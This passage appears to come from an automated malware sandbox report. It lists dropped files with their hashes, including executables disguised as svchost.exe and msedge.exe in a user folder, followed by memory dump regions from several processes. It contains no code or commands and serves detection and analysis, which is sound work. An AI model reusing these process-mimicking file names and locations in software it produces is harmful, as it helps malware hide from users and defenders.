                                                                                                                                                                                  584f69b507ddf33985673ee612e6099aff760fb1

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  16431cc14917abeb316e0bc44045440a8f86b7ac4fdd0dce99de6435d493ecca

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  6fd03320ec84baf09a16a127c2c0ed3c265906fcb1a3b807c13001e775c396b66539238392438a8f290be04b8b8684050736331f8f99dbe8b868b44f154dd9de

                                                                                                                                                                                • C:\Users\Admin\msedge.exe

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  146KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  f1c2525da4f545e783535c2875962c13

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  92bf515741775fac22690efc0e400f6997eba735

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  9e6985fdb3bfa539f3d6d6fca9aaf18356c28a00604c4f961562c34fa9f11d0f

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  56308ac106caa84798925661406a25047df8d90e4b65b587b261010293587938fa922fbb2cfdedfe71139e16bfcf38e54bb31cbcc00cd244db15d756459b6133

                                                                                                                                                                                • C:\Users\Admin\svchost.exe

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  226KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  1bea6c3f126cf5446f134d0926705cee

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  02c49933d0c2cc068402a93578d4768745490d58

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  1d69b5b87c4cd1251c5c94461a455659febb683eab0ebd97dd30da2319ffc638

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  eb9f423f6adb5e686a53f5f197e6b08455f8048d965a9ec850838fdf4724ef87f68945c435ace5a48a9a7226006a348e97586335d0246ea0dc898a412dea5df3

                                                                                                                                                                                • C:\exm\EXMservice.exe

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  12.0MB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  aab9c36b98e2aeff996b3b38db070527

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  4c2910e1e9b643f16269a2e59e3ada80fa70e5fa

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  c148cc14f15b71a2d3f5e6bce6b706744f6b373a7e6c090c14f46f81d2d6e82f

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  0db75756a041a7cda6b384718581aaf11e6873614465dd56e81f17ad171cffe380e288a3c2ee540222190392904921f26df8a1d66d4108051c60fc8e5b2df779

                                                                                                                                                                                • memory/1220-129-0x0000023225D60000-0x0000023225E64000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.0MB

                                                                                                                                                                                • memory/1220-117-0x00000232258C0000-0x0000023225946000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  536KB

                                                                                                                                                                                • memory/1220-123-0x0000023225870000-0x0000023225892000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  136KB

                                                                                                                                                                                • memory/1220-128-0x0000023225860000-0x0000023225870000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  64KB

                                                                                                                                                                                • memory/2452-153-0x000002A0F3700000-0x000002A0F3716000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  88KB

                                                                                                                                                                                • memory/2452-155-0x000002A0F36F0000-0x000002A0F36FA000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  40KB

                                                                                                                                                                                • memory/2452-154-0x000002A0F3720000-0x000002A0F3732000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  72KB

                                                                                                                                                                                • memory/2936-447-0x000000001CBB0000-0x000000001CBF2000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  264KB

                                                                                                                                                                                • memory/2936-253-0x0000000000E70000-0x0000000000E9A000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  168KB

                                                                                                                                                                                • memory/3436-197-0x00000000005C0000-0x0000000000626000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  408KB

                                                                                                                                                                                • memory/3544-272-0x0000000006010000-0x0000000006114000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.0MB

                                                                                                                                                                                • memory/3544-334-0x0000000006120000-0x0000000006162000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  264KB

                                                                                                                                                                                • memory/3544-265-0x00000000058E0000-0x0000000005946000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  408KB

                                                                                                                                                                                • memory/3544-448-0x0000000006710000-0x00000000067A2000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  584KB

                                                                                                                                                                                • memory/3544-449-0x0000000006D60000-0x0000000007304000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  5.6MB

                                                                                                                                                                                • memory/3544-454-0x00000000061C0000-0x00000000061CA000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  40KB

                                                                                                                                                                                • memory/3544-258-0x0000000000B10000-0x0000000000B4E000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  248KB